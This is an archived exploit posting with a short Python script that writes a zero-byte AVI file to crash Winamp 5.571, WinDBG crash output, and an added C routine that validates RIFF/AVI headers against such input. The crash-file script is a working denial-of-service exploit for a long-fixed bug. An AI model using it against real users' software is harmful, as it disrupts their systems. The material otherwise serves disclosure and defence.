Winamp v5.571 Malicious AVI Denial of Service
Posted on 28 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Winamp v5.571 Malicious AVI Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
=============================================
Winamp v5.571 Malicious AVI Denial of Service
=============================================

# Tested on Windows 7 and Winamp v5.571 (x86)
# This bug was reported to Nullsoft and was fixed long ago.
# The status can be found at http://forums.winamp.com/showthread.php?s=&threadid=316000
# This code works on Python 3.0. To make it work on Python versions below 3.0,
# remove the parentheses in the print calls.

print(" ***Winamp v5.571 malicious AVI file handling DoS Vulnerability*** ")
try:
    # Opening in write mode and closing immediately leaves a zero-byte file.
    open('winampcrash.avi', 'w').close()
    print("Creating malicious AVI file . . . ")
    print("Successfully created Zero size AVI file ")
    print("Open created Zero size AVI file in Winamp.....Boom ")
except IOError:
    print("Unable to create Zero size AVI file ")

"""
Following is the WinDBG status when we open the winampcrash.AVI file in Winamp v5.571 (x86)

(f00.e60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=0886fe68 edi=02880618
eip=076243f1 esp=0886fc50 ebp=0886ff28 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
in_AVI!winampGetInModule2+0x13da:
076243f1 8b4008 mov eax,dword ptr [eax+8] ds:002b:00000008=????????
"""

#Best Regards,
#Praveen Darshanam

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-28]
</pre></body></html>
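The WinDBG output above shows in_AVI reading through a NULL pointer (eax=0 at `mov eax,dword ptr [eax+8]`) after a zero-byte file is opened. The following C code is an added example, not code from the original post or from Nullsoft: it shows the kind of header check a RIFF/AVI reader can run before it touches any parser state. The function name `avi_precheck` and the result codes are hypothetical, and the in_AVI source itself is not on the page.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical result codes for this example. */
enum avi_check { AVI_OK = 0, AVI_EMPTY, AVI_TRUNCATED, AVI_BAD_MAGIC, AVI_BAD_SIZE };

/* Read a 32-bit little-endian value without assuming alignment. */
static uint32_t rd_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Validate the 12-byte RIFF header ("RIFF", LE size, "AVI ") before any
 * parser structure is allocated or dereferenced. buf may be NULL if len is 0. */
enum avi_check avi_precheck(const unsigned char *buf, size_t len)
{
    if (buf == NULL || len == 0)
        return AVI_EMPTY;            /* the zero-size file from the PoC */
    if (len < 12)
        return AVI_TRUNCATED;        /* not even a complete RIFF header */
    if (memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "AVI ", 4) != 0)
        return AVI_BAD_MAGIC;
    /* The RIFF size field counts everything after the first 8 bytes, so it
     * must cover the form type and must not claim more data than exists. */
    uint32_t riff_size = rd_le32(buf + 4);
    if (riff_size < 4 || (uint64_t)riff_size + 8 > (uint64_t)len)
        return AVI_BAD_SIZE;
    return AVI_OK;
}

int main(void)
{
    /* Constructed sample: minimal header whose RIFF size is 4 ("AVI " only). */
    static const unsigned char ok[12] = {'R','I','F','F', 4,0,0,0, 'A','V','I',' '};
    return avi_precheck(ok, sizeof ok) == AVI_OK &&
           avi_precheck(NULL, 0) == AVI_EMPTY ? 0 : 1;
}
```

A caller that gets anything other than `AVI_OK` should refuse the file and return an error to the player instead of continuing into chunk parsing.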